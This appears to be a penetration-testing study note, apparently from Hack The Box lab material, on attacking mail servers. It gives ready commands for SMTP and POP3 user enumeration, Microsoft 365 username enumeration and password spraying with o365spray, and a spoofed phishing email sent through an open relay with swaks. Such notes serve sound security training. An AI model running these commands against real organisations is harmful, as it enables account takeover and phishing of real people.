A mail server is a server that handles and delivers email over a network, usually over the Internet. A mail server can receive emails from a client device and them to other mail servers.

Email servers enumeration require us to look at multiple servers, ports, and services. Most companies have their email services in the cloud with services such as Microsoft 365 or G-suite.

Some important ports to note for mail servers:

PortService
TCP/25SMTP Unencrypted
TCP/143IMAP4 Unencrypted
TCP/110POP3 Unencrypted
TCP/465SMTP Encrypted
TCP/587SMTP Encrypted/STARTTLS
TCP/993IMAP4 Encrypted
TCP/995POP3 Encrypted

Mail Server Discovery

We can use MX DNS records to identify a mail server. The MX records specifies the mail server responsible for accepting email messages on behalf of a domain name. Multiple of these records can exist.

# View MX records
host -t MX hackthebox.eu
# or
dig mx inlanefreight.com | grep "MX" | grep -v ";"
 
# A records
host -t A mail1.inlanefreight.htb

SMTP User Enumeration

Use SMTP commands manually first, then automate with a user list when the server allows it.

# connect to SMTP server
telnet 10.10.110.20 25
 
# list users on the mail server
VRFY root
 
# list all users on a distribution list
EXPN support-team
 
# identify the recipient of the email message
RCPT TO:julio
 
# automated
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

POP3 User Check

# enumerate users
USER julio

Cloud Enumeration and Spray

Cloud providers use their own implementation for email services. Those services have custom features that can be abused.

# validate domain
python3 o365spray.py --validate --domain msplaintext.xyz
 
# identify usernames
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
 
# password spraying
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

Open Relay Abuse

Unauthenticated Email Relay allow email from any source to be transparently re-routed through the open relay server. This behavior masks the source of the messages and make it look like the mail originated from the open relay server.

As an attacker we can abuse this for phishing by sending emails as non-existing users or spoofing someone else’s email.

# connect to mail server and send mail
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213